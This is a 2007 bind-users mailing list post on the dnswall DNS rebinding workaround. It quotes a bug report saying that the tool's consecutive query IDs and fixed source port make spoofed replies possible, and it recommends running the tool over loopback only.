DNS rebinding partial workaround
Kevin Darcy
kcd at daimlerchrysler.com
Thu Sep 13 23:07:30 UTC 2007
Mordechai T. Abzug wrote:
> One of my coworkers pointed out that the DNS rebinding folks have a
> partial workaround:
>
> http://code.google.com/p/google-dnswall/
>
> It's not much, in that it's specific to private address space, and
> doesn't even touch the name portion of RRs, but it's a start.
>
From the "Issues" tab of that code repository:
Reported by james.raftery <http://code.google.com/u/james.raftery/>,
Aug 16, 2007
dnswall 0.1.3 issues query IDs which are consecutive. As a defence against
reply spoofing, query IDs should not be predictable. For
backgroundinformation, search Google for "dns predictable query id".
This is compounded by dnswall sending its queries from the same
sourceport. By observing one query from dnswall on the network I can
predict with100% certainty the source port and query ID of the next
query and therebysend a spoofed reply to it.
In light of this I consider dnswall to only be safe to use when its
pathto the "real" upstream DNS server is certain to be private (e.g.
over a loopback interface on the same machine).
The suggestion in the README file to forward to a remote DNS server, such as an ISP's resolver, is wholly inappropriate and should be removed in
favour of a strong recommendation for a loopback-only scenario.
- Kevin
More information about the bind-users
mailing list